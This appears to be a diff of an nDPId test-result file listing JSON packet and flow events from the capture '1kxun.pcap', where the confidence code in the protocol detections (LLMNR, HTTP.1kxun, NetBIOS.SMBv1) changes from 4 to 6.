00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxkAAAER6ZbAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
-00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
+00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
+00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMMsAAAER0qXAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOp0AAAERyODAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379271,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104379271,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxsAAAER6ZTAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1470104379579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAEQAABAAEARs0nAqAVDwKj\/\/wCKAIoA\/P+KEQouQ8CoBUMAigDmAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAATAAAAAAAAAAAAAAAAAAAAAAAAABMAFYAAwABAAEAAgBdAFxNQUlMU0xPVFxCUk9XU0UAD1DgkwQAU0FOSkktTElGRUJPT0stTAQJA5qEAA8BVapzYW5qaS1MSUZFQk9PSy1MSDUzMSBzZXJ2ZXIgKFNhbWJhLCBVYnVudHUpAA=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00741{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1470104379579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAD5AABAAEARs2DAqAVDwKj\/\/wCKAIoA5V88EQouRMCoBUMAigDPAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAANQAAAAAAAAAAAAAAAAAAAAAAAAA1AFYAAwABAAEAAgBGAFxNQUlMU0xPVFxCUk9XU0UADFDgkwQAV09SS0dST1VQAAAAAAAAAAQJABAAgA8BVapTQU5KSS1MSUZFQk9PSy1MSDUzMQA="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1470104379887,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104379887,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiDQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACATQ="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -159,89 +159,89 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}} 